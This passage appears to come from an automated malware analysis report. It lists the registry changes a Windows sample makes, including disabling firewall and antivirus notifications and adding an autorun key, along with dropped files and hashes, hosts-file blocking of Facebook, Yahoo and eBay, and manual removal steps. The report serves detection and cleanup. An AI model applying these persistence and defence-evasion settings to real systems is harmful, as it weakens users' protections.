"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E4 7D A1 48 A5 BF 24 0F 4F A3 A5 99 98 31 92 AA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"
The Malware deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
The process glhljywourzj.exe:2816 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 41 6C 67 D1 9D C6 14 E5 2D 15 28 AC 0E 93 40"
The process glhljywapnzj.exe:4856 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E 19 D3 32 5A C4 6A F1 E7 BF 13 F1 E6 36 F5 B0"
The process glhljywapnzj.exe:4708 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "50 E0 BC B1 90 4E 7C 0A B3 E6 34 89 67 DA CB 48"
The process glhljyvzcczjsznjntrz.exe:2508 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A 1F 72 58 BC E7 C1 40 00 46 F5 CA B7 44 76 04"
To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Presentation Accounts Workstation" = "%System%\unovkkdak.exe"
The process glhljywpp4zj.exe:3992 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "44 59 14 91 20 C0 8B 44 76 E0 CD 66 F7 11 66 9F"
The process glhljyw1jczj.exe:5872 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 97 83 FD 77 F2 98 8D A2 65 5C 26 3B 83 CA 12"
Dropped PE files
MD5 | File path |
---|---|
c814feb9e90206f83de6232e76b52e4f | c:\WINDOWS\system32\mqyitew\dropbox\phantomjs197.exe |
d583db9137253e0dd45d35c376173e8f | c:\WINDOWS\system32\mqyitew\purple\exefile |
d16fb37fb64925e5fcb9c5f7f18f8138 | c:\WINDOWS\system32\mqyitew\purple\freebl3.dll |
9f95ece3d2b3909de4d9147c4d93f976 | c:\WINDOWS\system32\mqyitew\purple\intl.dll |
e2ac23418781f632311513944edd0a4c | c:\WINDOWS\system32\mqyitew\purple\libgcc_s_dw2-1.dll |
18e88b04da123bf05b07ff60a4e96654 | c:\WINDOWS\system32\mqyitew\purple\libglib-2.0-0.dll |
b0b2396fc6413016a45a5e8ca2ea8152 | c:\WINDOWS\system32\mqyitew\purple\libgmodule-2.0-0.dll |
356d697647a480562c4e2e921b13f8ed | c:\WINDOWS\system32\mqyitew\purple\libgobject-2.0-0.dll |
7ad6f303082b382bff7bafbab246c61f | c:\WINDOWS\system32\mqyitew\purple\libgthread-2.0-0.dll |
158b8d977b663dadbf052dc3ff625db7 | c:\WINDOWS\system32\mqyitew\purple\libjabber.dll |
7aa32658927457f6bbc917bfed740060 | c:\WINDOWS\system32\mqyitew\purple\libnspr4.dll |
ff42fa60aeee5b145a495b2dc03d7be5 | c:\WINDOWS\system32\mqyitew\purple\libplc4.dll |
1167d1b5699ff7f3a3946a714116b604 | c:\WINDOWS\system32\mqyitew\purple\libplds4.dll |
6a2fae3c859ffb708b592bb4eecb98f5 | c:\WINDOWS\system32\mqyitew\purple\libpurple.dll |
d7dc3c8976d465a72befaa20d652d0a2 | c:\WINDOWS\system32\mqyitew\purple\libsasl.dll |
550b3ec2d6a2db0036b4e6e057b54768 | c:\WINDOWS\system32\mqyitew\purple\libssp-0.dll |
d8daf5ada5cc24d8b0bb4f330e8e83e3 | c:\WINDOWS\system32\mqyitew\purple\libxml2-2.dll |
9950a16dcb7b6059560310ff4b9c4d8b | c:\WINDOWS\system32\mqyitew\purple\libymsg.dll |
0e77713336837ec8946b8a0f0ae117c6 | c:\WINDOWS\system32\mqyitew\purple\nss3.dll |
3b74e32535fbd58228232f58b924c3fe | c:\WINDOWS\system32\mqyitew\purple\nssutil3.dll |
d3766d16190904485e566144ba3214da | c:\WINDOWS\system32\mqyitew\purple\plugins\libxmpp.dll |
834d15d762c66a2037a25b0d9c235f09 | c:\WINDOWS\system32\mqyitew\purple\plugins\libyahoo.dll |
f682806675838619bb12e32a4da5cae2 | c:\WINDOWS\system32\mqyitew\purple\plugins\ssl-nss.dll |
7e58936c483f06ae1aa81df13d64e031 | c:\WINDOWS\system32\mqyitew\purple\plugins\ssl.dll |
e67de22684cf17bd99998058a5d5d657 | c:\WINDOWS\system32\mqyitew\purple\plugins\statenotify.dll |
1a0a90e693490d58d94542bc6a0bfbf2 | c:\WINDOWS\system32\mqyitew\purple\plugins\xmppconsole.dll |
53da77fb3ba39dd8b4f5d9f6ae082717 | c:\WINDOWS\system32\mqyitew\purple\plugins\xmppdisco.dll |
2193a40a800170b380fbfc039e593f65 | c:\WINDOWS\system32\mqyitew\purple\purple.exe |
1a3c18e050ef86cb6d0284f51ecb3e39 | c:\WINDOWS\system32\mqyitew\purple\sasl2\saslANONYMOUS.dll |
38c529b4daa4293548f6f367ea31d955 | c:\WINDOWS\system32\mqyitew\purple\sasl2\saslCRAMMD5.dll |
ce06799381174f3524c0893f645dff00 | c:\WINDOWS\system32\mqyitew\purple\sasl2\saslDIGESTMD5.dll |
12b053c2eccc8285d69323b80ee9ddf1 | c:\WINDOWS\system32\mqyitew\purple\sasl2\saslGSSAPI.dll |
521492b4ac37fa5a1896eb8ba7b0eaf1 | c:\WINDOWS\system32\mqyitew\purple\sasl2\saslLOGIN.dll |
6ce549e4c41074a837712dfa041d05ef | c:\WINDOWS\system32\mqyitew\purple\sasl2\saslPLAIN.dll |
c04ee77a36b82536269bff437b0cf4e0 | c:\WINDOWS\system32\mqyitew\purple\smime3.dll |
b1dde425a07484c3d0c8bf4ad0dc1e59 | c:\WINDOWS\system32\mqyitew\purple\softokn3.dll |
624c05297992577eccaabb0f646b5875 | c:\WINDOWS\system32\mqyitew\purple\sqlite3.dll |
e64e775bce8695c136feba29e9396d7f | c:\WINDOWS\system32\mqyitew\purple\ssl3.dll |
79aef4a7acaeb0e979537a4bc3dcc851 | c:\WINDOWS\system32\mqyitew\purple\zip.exe |
5ff2481c69e5dd4107c44ab42cc27ba2 | c:\WINDOWS\system32\mqyitew\purple\zlib1.dll |
fecf803f7d84d4cfa81277298574d6e6 | c:\WINDOWS\system32\unzip.exe |
1b6d0ba25cd8f682ad75f73915dd7007 | c:\WINDOWS\system32\win32mrocli2.exe |
3483ee2d23db062524803c9da68d1f83 | c:\WINDOWS\system32\win64mroaes2.exe |
cb45f631d08bae01a0e50d1e8ee8046d | c:\WINDOWS\system32\win64mrocli2.exe |
HOSTS file anomalies
The Malware modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses. The modified file is 804 bytes in size. The following strings are added to the hosts file listed below:
127.0.0.1 | www.facebook.com |
127.0.0.1 | facebook.com |
127.0.0.1 | mail.yahoo.com |
127.0.0.1 | my.ebay.com |
127.0.0.1 | cgi.ebay.com |
127.0.0.1 | offer.ebay.com |
127.0.0.1 | feedback.ebay.com |
127.0.0.1 | motors.search.ebay.com |
127.0.0.1 | search.ebay.com |
127.0.0.1 | pages.ebay.com |
127.0.0.1 | pages.motors.ebay.com |
127.0.0.1 | myworld.ebay.com |
127.0.0.1 | motors.listings.ebay.com |
127.0.0.1 | cgi1.ebay.com |
127.0.0.1 | contact.ebay.com |
127.0.0.1 | srx.ebaymotors.ebayrtm.com |
127.0.0.1 | motors.shop.ebay.com |
127.0.0.1 | forums.ebay.com |
127.0.0.1 | answercenter.ebay.com |
127.0.0.1 | shop.ebay.com |
127.0.0.1 | ocs.ebay.com |
127.0.0.1 | cschatlb-na.corp.ebay.com |
127.0.0.1 | cschat1-na.corp.ebay.com |
127.0.0.1 | cschat.ebay.com |
127.0.0.1 | helpdesk.corp.ebay.com |
127.0.0.1 | qu.corp.ebay.com |
127.0.0.1 | www.ebay.com |
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
win32mrocli2.exe:428
%original file name%.exe:1256
purple.exe:2604
unzip.exe:2576
unzip.exe:6116
unovkkdak.exe:4740
unovkkdak.exe:3644
eityzygishyx.exe:564
eityzygishyx.exe:4936
glhljywourzj.exe:2816
glhljywapnzj.exe:4856
glhljywapnzj.exe:4708
glhljyvzcczjsznjntrz.exe:2508
glhljywpp4zj.exe:3992
glhljyw1jczj.exe:5872 - Delete the original Malware file.
- Delete or disinfect the following files created/modified by the Malware:
%Documents and Settings%\%current user%\Local Settings\Temp\glhljyvzcczjsznjntrz.exe (3883 bytes)
%System%\mqyitew\tst (10 bytes)
C:\dev\null\icons\24e5b564d56b4d1796b0dc4344959e47b69727e2.jpg.save (5 bytes)
C:\dev\null\icons\44fc67967f917b10ff19f38897c1bbd2d6ff2e35.jpg.save (5 bytes)
C:\dev\null\icons\583b4a20a047387492f6d590b5b9dde3f21c37fb.jpg.save (5 bytes)
C:\dev\null\icons\a8666123c3b28dcc219d1b77977b6b117925151b.jpg.save (5 bytes)
C:\dev\null\icons\38b72e51556edcd947566844b29968c385bfbc8b.jpg.save (5 bytes)
C:\dev\null\icons\245845f77a47c462b516fe16a04f4c2bca53f2af.jpg.save (5 bytes)
C:\dev\null\icons\b5e697d54a2a949708cb36ca28de44e15d94b77e.jpg.save (5 bytes)
C:\dev\null\icons\9235f133902a2e5a8c903257f30a33a9081eabc3.jpg.save (5 bytes)
C:\dev\null\icons\c11fa36622ea7c9801e8a7f1f8edbb090710860c.jpg.save (5 bytes)
C:\dev\null\icons\6f5c34656ae889d3a4be5752bac2ba158d914d30.jpg.save (5 bytes)
C:\dev\null\icons\d94f5c277f5a1bde18e7fb091adf4a691c0899e5.jpg.save (5 bytes)
C:\dev\null\icons\b688b8627d9ad1860fdd92f5b945854c0296c84e.jpg.save (5 bytes)
C:\dev\null\icons\666817ac7e958c3f00849b37a7331edb26e145ec.jpg.save (5 bytes)
C:\dev\null\icons\bd04b63ac46de0e663dbe85fde1c7e47ce3ff7f1.jpg.save (5 bytes)
C:\dev\null\icons\b76dbec37693329ba77eb18e79b39fb5fbf3054d.jpg.save (5 bytes)
C:\dev\null\icons\e6f6bbd5fafb7ff340f15ff6b3abc8caf850e315.jpg.save (5 bytes)
C:\dev\null\icons\d0c441ce203a51a3bae938018df3e5008a410d30.jpg.save (5 bytes)
C:\dev\null\icons\11e318a152e6529bbc35d7d9162e9c9aadad2ef0.jpg.save (5 bytes)
C:\dev\null\icons\3b76e70d5ed8690323495fb5524d677b5c609400.jpg.save (5 bytes)
C:\dev\null\icons\4553ab0ce0319aba787e20b0d556851615ccbb70.jpg.save (5 bytes)
C:\dev\null\icons\15e6a4765f6b8cce43698383bb17cfd498e02a0b.jpg.save (5 bytes)
C:\dev\null\icons\eaf0d8fd1743714599baf123924e6d3ac059156e.jpg.save (5 bytes)
C:\dev\null\icons\e341afabfc4d58e582d78a533eddb486d2f30ffc.jpg.save (5 bytes)
C:\dev\null\icons\8506be1381a997df1dc523e7b482ec01f38a4379.jpg.save (5 bytes)
C:\dev\null\icons\2c423a99e263dc28037c9fc1e8e84832ab2de9e3.jpg.save (5 bytes)
C:\dev\null\icons\5f210f8347bcd25e6f25ecc6247a7289a1d4f55c.jpg.save (5 bytes)
C:\dev\null\icons\25362109a4500f4c90538040e1231fcc629b3c8d.jpg.save (5 bytes)
C:\dev\null\icons\3da8e0656812f00e88ee3778e7770a849087c87b.jpg.save (5 bytes)
C:\dev\null\icons\2773de6db6f0bf389a1894aad4acf386d408f494.jpg.save (5 bytes)
C:\dev\null\icons\48b91aab153f9ffe7879a1cc6d89bbe6e083f7a0.jpg.save (5 bytes)
C:\dev\null\icons\913bc246c1791e69842270061dd6d042960dc94d.jpg.save (5 bytes)
C:\dev\null\icons\3784219f65e8d4e36cd26cde04e8821f423197e1.jpg.save (5 bytes)
C:\dev\null\icons\eaab6294c2c71677224bacb89dc712dcfaf5855e.jpg.save (5 bytes)
C:\dev\null\icons\301fc70c8fbd2a3017832c5c169bf2d324f3da7e.jpg.save (5 bytes)
C:\dev\null\icons\6d035cbf152f2f323826bc48cc9ed6edee5a5610.jpg.save (5 bytes)
C:\dev\null\icons\2d5f2725aeeb39d2b73fba914d1eaa5024119005.jpg.save (5 bytes)
C:\dev\null\icons\69a339461c86da40f494ed26abc1d12ff1f4fab5.jpg.save (5 bytes)
C:\dev\null\icons\63c0dab3c8b04b979ff8f4a9f29bd2286abc8c2c.jpg.save (5 bytes)
C:\dev\null\icons\277550b871fd84f39688ce0ae7e82f34d78f5db7.jpg.save (5 bytes)
C:\dev\null\icons\8aa806930ad4ca4a5ec3427c5796fbe91ee71f22.jpg.save (5 bytes)
C:\dev\null\icons\fec20686ac06dfd471656ea58f759f8ad50252b6.jpg.save (5 bytes)
C:\dev\null\icons\ca839c923b09a03377ccb1ff62af53ce474c9f76.jpg.save (5 bytes)
C:\dev\null\icons\152b17fd93e6588aae66c35eac8b90ceae152474.jpg.save (5 bytes)
C:\dev\null\icons\8a5ecd76a959529f6edfa0bc3d746f226de3cc1c.jpg.save (5 bytes)
C:\dev\null\icons\c626735a7764616e285ab8651240ddf7c227deff.jpg.save (5 bytes)
C:\dev\null\icons\d09c11dea18d4f26421157d9817b6a78333d421d.jpg.save (5 bytes)
C:\dev\null\icons\7a037474380e10e4114d34df27c7f719750f26b6.jpg.save (5 bytes)
C:\dev\null\icons\badeaad5b386acf782d712f79c2eaede1898fe8f.jpg.save (5 bytes)
C:\dev\null\icons\f92d9cd8314e6fd1ad6eac6baecb696abea59469.jpg.save (5 bytes)
C:\dev\null\icons\6c2add77cd1b32e41657342a1aa9c844bd68acd5.jpg.save (5 bytes)
C:\dev\null\accounts.xml.save (146 bytes)
C:\dev\null\icons\61bd633e8348cd7cda6332f0091b364fd1304228.jpg.save (5 bytes)
C:\dev\null\icons\41b3ad01aeabfff74efb3c00f8a6ef3c64d31f68.jpg.save (5 bytes)
C:\dev\null\icons\a51994902670d9aa461d0bcaf28104b8ff6d5f59.jpg.save (5 bytes)
C:\dev\null\icons\d5da8b1fd7bd631465419dbbce8358dfa2cb4abb.jpg.save (5 bytes)
C:\dev\null\icons\669ffde9f8d3aab3b99868ed8305d5251acf568b.jpg.save (5 bytes)
C:\dev\null\icons\59d0afc10817f666da61599f4ebae157b71b282a.jpg.save (5 bytes)
C:\dev\null\icons\6e8e61003aa3ea022af6aa587fa86776d3110c19.jpg.save (5 bytes)
C:\dev\null\icons\0629957ac0ac3c0984da13d12c9400ebdb01a4b2.jpg.save (5 bytes)
C:\dev\null\icons\23b81f9bc63ab275622657cd877dd9db2fbe451b.jpg.save (5 bytes)
C:\dev\null\icons\e27f4a709a4b91cd310cc12839c97b599d04443b.jpg.save (5 bytes)
C:\dev\null\icons\f0d7fdd2430fe14fe3b9936a81ecad86cc3b0d23.jpg.save (5 bytes)
C:\dev\null\icons\f2cc26fa05bcef7f833e02fde24fd44a5574e012.jpg.save (5 bytes)
C:\dev\null\status.xml.save (551 bytes)
C:\dev\null\icons\e6ba4580705b7614e6fc310ca2749c2c59557807.jpg.save (5 bytes)
C:\dev\null\icons\f95c1c6eb5593c9cb5589d267df1657a3d18cdc8.jpg.save (5 bytes)
C:\dev\null\icons\005fbc4b3cb146c8098badbc3e3c5c4516a2b2a0.jpg.save (5 bytes)
C:\dev\null\icons\3176e5c56e4007d4cec15d3e5ee7b3c05fc9d821.jpg.save (5 bytes)
C:\dev\null\icons\a797b30b4a519f36a19f4efcb662b555a42b77a9.jpg.save (5 bytes)
C:\dev\null\icons\1c197f09c6aa1ebc5f130a8cf5cc0721e8274160.jpg.save (5 bytes)
C:\dev\null\icons\7aaa0c3cef3bc52936bbf26f69d122a8531a4fdc.jpg.save (5 bytes)
C:\dev\null\icons\1d060cc267b0bdee1db9bf7e3b70db40fb2a1d1d.jpg.save (5 bytes)
C:\dev\null\icons\b85e74b2e16b150fc74c04bea72846d5ba861120.jpg.save (5 bytes)
C:\dev\null\icons\c51f62632c285d604506115f2488a8c529d86fff.jpg.save (5 bytes)
C:\dev\null\icons\d0043e0612cc62d10f3e56ff5605b97151fba2e2.jpg.save (5 bytes)
C:\dev\null\icons\c447baccbb86131f8b7f06455e5f784e7406875c.jpg.save (5 bytes)
C:\dev\null\icons\6f7a8a326b4d3ef245fab3019e730495bfa4b3ff.jpg.save (5 bytes)
C:\dev\null\icons\50ab434275cfb714e30f4ae6807d2d48e901f456.jpg.save (5 bytes)
C:\dev\null\icons\fcc65c34ab46530603387dc2b0cf203986424778.jpg.save (5 bytes)
C:\dev\null\icons\f86c0968b55852aff6fdb8134b83348477d205db.jpg.save (5 bytes)
C:\dev\null\icons\4806483986e60cad969a1707422a715d42f62161.jpg.save (5 bytes)
C:\dev\null\icons\e864caf001491035549485ec0ab163423e69da96.jpg.save (5 bytes)
C:\dev\null\icons\144ae9548d5b8c728a7d193cbad0e82270db5f59.jpg.save (5 bytes)
C:\dev\null\icons\73e1fa4cea1e684f9668a17985d5b3dab2447835.jpg.save (5 bytes)
C:\dev\null\icons\0aa6c2e449161c0e0f99b36cea819d0558926a91.jpg.save (5 bytes)
C:\dev\null\icons\b15a27be277dab59ec28552586bb2dd6ca6ccee7.jpg.save (5 bytes)
C:\dev\null\icons\e9adfad40f833f7762653ec212ec103c9f600f39.jpg.save (5 bytes)
C:\dev\null\icons\ab57c70dc1e997465b1a9b3211788914b7a19e96.jpg.save (5 bytes)
C:\dev\null\icons\c44004785c10a859dabfb2c9367cae0ffb703bf7.jpg.save (5 bytes)
C:\dev\null\icons\672f241bea6963a36dd5695b5fe3f4629376c0da.jpg.save (5 bytes)
C:\dev\null\icons\d6056b785ebc7f8b537ff356fd1ddcac0110bb1b.jpg.save (5 bytes)
C:\dev\null\icons\8c05df51218481539fe6057b6d3b389910492221.jpg.save (5 bytes)
C:\dev\null\icons\252a56b4ea1b746fcfee080190c17ea3427d84ab.jpg.save (5 bytes)
C:\dev\null\icons\485071ec7068eb6f1d0e5bea1128578b2c269adb.jpg.save (5 bytes)
C:\dev\null\icons\568310ec88a22903677e41668bf713d42201a7e3.jpg.save (5 bytes)
C:\dev\null\icons\bc44b5c3afd27ce45f8d3ff33a8ff00a67aa7be4.jpg.save (5 bytes)
C:\dev\null\icons\35c8f63338d1d8b3e105821ff6c073bc7e32c64b.jpg.save (5 bytes)
C:\dev\null\icons\bded82350b81a88f29535b3d2ff7f1d3174d0f62.jpg.save (5 bytes)
C:\dev\null\icons\6238f7b1beda6f61518a73109b44b1b4850cb076.jpg.save (5 bytes)
C:\dev\null\icons\4de41723633eaee5dbfdd3b81ab99d893ad5af5e.jpg.save (5 bytes)
C:\dev\null\icons\4c5abdf6fc4709a31250ed9282231dd73e53cb78.jpg.save (5 bytes)
C:\dev\null\icons\4c0acdeac39c421dfc981f9b5c3772ba7afef119.jpg.save (5 bytes)
C:\dev\null\certificates\x509\tls_peers\chat.facebook.com.save (5 bytes)
C:\dev\null\icons\1de34f64317b2abc9608e23df1dd6effb39a4d2d.jpg.save (5 bytes)
C:\dev\null\icons\b621750e66296ac0ea0dd7e7e50be53052cf1471.jpg.save (5 bytes)
C:\dev\null\icons\4fee2f853ee309b79a35c76650633a0ba58525b6.jpg.save (5 bytes)
C:\dev\null\icons\dab66afc9f14e3adb4b64533857fdd9c5d33cd0f.jpg.save (5 bytes)
C:\dev\null\icons\ac421f7a9c547c27c45627d1558c728621ab5df2.jpg.save (5 bytes)
C:\dev\null\icons\42fdc32270a1fd5a75143f4dd1556f2e96f74e7e.jpg.save (5 bytes)
C:\dev\null\icons\feb5bbd7f1ec2e48aa8bd9850279953f3cb8ff15.jpg.save (5 bytes)
C:\dev\null\icons\6b756679fda59cc6d3d320331e2e807e2e8034c4.jpg.save (5 bytes)
C:\dev\null\icons\2657185809fd100acc7077ef5ee905ed203b6bd2.jpg.save (5 bytes)
C:\dev\null\icons\b51bc5756e0f731155ee5826c634b66f611869be.jpg.save (5 bytes)
C:\dev\null\icons\d5da23a964bb94cdf1e0a47958c2e3e28274188a.jpg.save (5 bytes)
C:\dev\null\prefs.xml.save (7 bytes)
C:\dev\null\icons\3e63dcb89b4bc7d919bef1ef173908160712d926.jpg.save (5 bytes)
C:\dev\null\icons\0c9c6d01b7a9d095ccfcd1be369a914a09a4d6ca.jpg.save (5 bytes)
C:\dev\null\icons\71c42a9b04d4a6da914f77d0b0d6159dfc908582.jpg.save (5 bytes)
C:\dev\null\icons\a3d9268f0017c757b0fd28b53330fa36c49f2922.jpg.save (5 bytes)
C:\dev\null\icons\1d8a79b8deb9b1da5151f84490811142a3b33821.jpg.save (5 bytes)
C:\dev\null\icons\e72f15737758a50dc5b32ea4814411d9cf9c5454.jpg.save (5 bytes)
C:\dev\null\icons\f198472c67b151b158fb3dc895b69b66a9f72cdc.jpg.save (5 bytes)
C:\dev\null\icons\af79198bd964f03af2cf2dba4501d0750222d39c.jpg.save (5 bytes)
C:\dev\null\icons\3e017c5887de83134844c5987061bf0b59dd1fac.jpg.save (5 bytes)
C:\dev\null\icons\2bb6cad6d70c366fc0f207c411de48be190aafd3.jpg.save (5 bytes)
C:\dev\null\icons\bffa03620c634a5072f35a696bde7b15e1be170d.jpg.save (5 bytes)
C:\dev\null\icons\b1aa85b50bc38e97e673896a151287a5cc173d1d.jpg.save (5 bytes)
C:\dev\null\icons\7a367f364e432fea2fda687e66b21fe765938c9b.jpg.save (5 bytes)
C:\dev\null\icons\2662e11f4c739960de346f1b4a2ed159d5e2ab63.jpg.save (5 bytes)
C:\dev\null\icons\9e6c49c2ab23a89ea699f598a8c2539a2ce64c8c.jpg.save (5 bytes)
C:\dev\null\icons\3220b53edceccc88455498a6044922043fca8ad0.jpg.save (5 bytes)
C:\dev\null\icons\80105ce1d710b5e8db09b7979e2bdf81d129dd4a.jpg.save (5 bytes)
C:\dev\null\icons\395523545d38ccdf1bab7e03c8b5f3973c465f4d.jpg.save (5 bytes)
C:\dev\null\icons\fd5de0b5b5bc0c9db46898396c7c181cb5ed27dd.jpg.save (5 bytes)
C:\dev\null\icons\3c0120a98c4d6ae8d19fd4946c9addba294623a3.jpg.save (5 bytes)
C:\dev\null\icons\491ef8c5b8a22eeaa4a6c764f58a82b572063458.jpg.save (5 bytes)
C:\dev\null\icons\fda508ec035ed8be377a4e2d47d86c62d470c56d.jpg.save (5 bytes)
C:\dev\null\icons\ab0d22e02b11e53efe3533b906f55f612c933a64.jpg.save (5 bytes)
C:\dev\null\icons\31343e6619f34d02e94bef801548cf2a2e5058e4.jpg.save (5 bytes)
C:\dev\null\icons\1b58d9794274c7d75a1f0c8544ff7aa0e33256a0.jpg.save (5 bytes)
C:\dev\null\icons\2eaed5d088ced02f68e9e8db0755425b720c06a2.jpg.save (5 bytes)
C:\dev\null\icons\448dd396dac3de51a031b53270a89860afbe2508.jpg.save (5 bytes)
C:\dev\null\icons\70b8caba98bc624353433293dec0ca0d9dec5761.jpg.save (5 bytes)
C:\dev\null\icons\1ba35261202e2f87d9c312fbd792c55f662b8819.jpg.save (5 bytes)
C:\dev\null\icons\ebcb620b4604a59882f68714f2f32f11e42eeb5d.jpg.save (5 bytes)
C:\dev\null\icons\f75ecd3b906820a93d1cab5eddc3a89f7a2656b3.jpg.save (5 bytes)
C:\dev\null\icons\341afa921fc8402bd996cb690276976ed8acb5de.jpg.save (5 bytes)
C:\dev\null\icons\b98c1dcd1c8eb63e0557335f3ceb63d3e37e86a0.jpg.save (5 bytes)
C:\dev\null\icons\9f30caf38edc13cf99865a136b1d8a924983e9ab.jpg.save (5 bytes)
C:\dev\null\icons\92c02ea9a72036e3d437c6e1ea5e49ba0f467178.jpg.save (5 bytes)
C:\dev\null\icons\640c645551a704c54eff18836b7eae8ee0da0975.jpg.save (5 bytes)
C:\dev\null\icons\33ac15b05076bdc29117a7e7e072364626bcb7d5.jpg.save (5 bytes)
C:\dev\null\icons\dab069465fa334a7dbf839bc1b41e86e78ab97a0.jpg.save (5 bytes)
C:\dev\null\icons\4b870ba980703bb14fceb9f0970c66a97433060e.jpg.save (5 bytes)
C:\dev\null\icons\8b1a6971a8965fa993cbbe9f82a75322ccbdf3e7.jpg.save (5 bytes)
C:\dev\null\icons\18199163eecf1b7312ebcacd2ba8828cf04e2d27.jpg.save (5 bytes)
C:\dev\null\icons\2c8b0c86518a24fef9f6cf169713769d07fc4a47.jpg.save (5 bytes)
C:\dev\null\icons\d2b14958b1c462c9a453bd55d58413e1fa7506f8.jpg.save (5 bytes)
C:\dev\null\icons\8981eeb38add7f1fb59159d8cd14a69bfde94add.jpg.save (5 bytes)
C:\dev\null\icons\bdc26f85f6f911c631eb430af63385e92f7e63cc.jpg.save (5 bytes)
C:\dev\null\icons\17e83ae90356598435c2b10f836eb38d81c68b97.jpg.save (5 bytes)
C:\dev\null\icons\83a02ccc9667e6de04d506e1943699dae7038ffc.jpg.save (5 bytes)
C:\dev\null\icons\3d2e363d935d1dbb5dda889958207316d899bd2b.jpg.save (5 bytes)
C:\dev\null\icons\c6b99d22efe0c3d8b6975491077d1cf045aa35a2.jpg.save (5 bytes)
C:\dev\null\icons\2f26a8a25c51902edbe0b30f5ff669fd8ce47b6f.jpg.save (5 bytes)
C:\dev\null\icons\ef672920e507926187f15453894c8e65eb57a6e2.jpg.save (5 bytes)
C:\dev\null\icons\df706e4466ff63060bfe2817e250cb182458532c.jpg.save (5 bytes)
C:\dev\null\icons\06786df37768a4b1442258546b1cc8a25b9c1002.jpg.save (5 bytes)
C:\dev\null\icons\b060fb7221dbe24840e631a53de9c0c0b10b0307.jpg.save (5 bytes)
C:\dev\null\icons\1c697641b354de15eacffed0bd38c7287eb1da96.jpg.save (5 bytes)
%System%\mqyitew\purple\nssutil3.dll (601 bytes)
%System%\mqyitew\purple\ca-certs\AddTrust_External_Root.pem (1 bytes)
%System%\mqyitew\purple\libpurple.dll (5873 bytes)
%System%\mqyitew\purple\ssl3.dll (1281 bytes)
%System%\mqyitew\purple\intl.dll (601 bytes)
%System%\mqyitew\purple\purple.exe (26 bytes)
%System%\mqyitew\purple\libnspr4.dll (1281 bytes)
%System%\mqyitew\purple\smime3.dll (601 bytes)
%System%\mqyitew\purple\ca-certs\Entrust.net_2048.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\Verisign_Class3_Primary_CA.pem (834 bytes)
%System%\mqyitew\purple\ca-certs\Microsoft_Internet_Authority_2010.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\ValiCert_Class_2_VA.pem (1 bytes)
%System%\mqyitew\purple\plugins\xmppdisco.dll (44 bytes)
%System%\mqyitew\purple\sqlite3.dll (3073 bytes)
%System%\mqyitew\purple\plugins\libyahoo.dll (22 bytes)
%System%\mqyitew\purple\plugins\xmppconsole.dll (37 bytes)
%System%\mqyitew\purple\ca-certs\Entrust.net_Secure_Server_CA.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\Microsoft_Secure_Server_Authority_2010.pem (2 bytes)
%System%\mqyitew\purple\sasl2\saslGSSAPI.dll (36 bytes)
